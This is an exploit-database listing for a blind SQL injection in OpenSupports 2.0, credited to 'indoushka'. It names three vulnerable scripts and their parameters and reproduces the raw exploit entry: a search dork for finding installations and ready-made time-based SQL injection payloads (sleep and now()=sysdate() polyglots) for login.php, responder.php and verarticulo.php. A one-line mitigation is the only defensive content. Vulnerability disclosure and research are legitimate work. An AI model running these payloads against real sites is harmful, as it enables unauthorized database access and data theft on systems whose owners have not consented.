header-logo
Suggest Exploit
vendor:
OpenSupports
by:
indoushka
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: OpenSupports
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:opensupports:opensupports:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

Open Support Blind SQL Injection v2.0 Vulnerability

This vulnerability affects /support/login.php, /support/responder.php and /support/verarticulo.php. An attacker can inject malicious SQL queries into the vulnerable parameters of the application. For example, in /support/login.php, an attacker can inject malicious SQL queries into the emailcorreoelectronico parameter. In /support/responder.php, an attacker can inject malicious SQL queries into the idarticulo and text_content parameters. In /support/verarticulo.php, an attacker can inject malicious SQL queries into the id parameter.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Open Support Blind SQL Injection v2.0 Vulnerability
===================================================
Author indoushka
=================
vendor :http://www.opensupports.com/files/Opensupports_v2_EN.rar
=================
# Dork : Power by OpenSupports © 2009 - 2014. All Rights reserved 


This vulnerability affects /support/login.php

emailcorreoelectronico=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&pass=g00dPa%24%24w0rD&Submit2=Login



This vulnerability affects /support/responder.php. 

idarticulo=&name=&staff=no&Submit=Send&text_content=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/



This vulnerability affects /support/verarticulo.php.

/support/verarticulo.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/

Navigation

Suggest Exploit

Services By CQR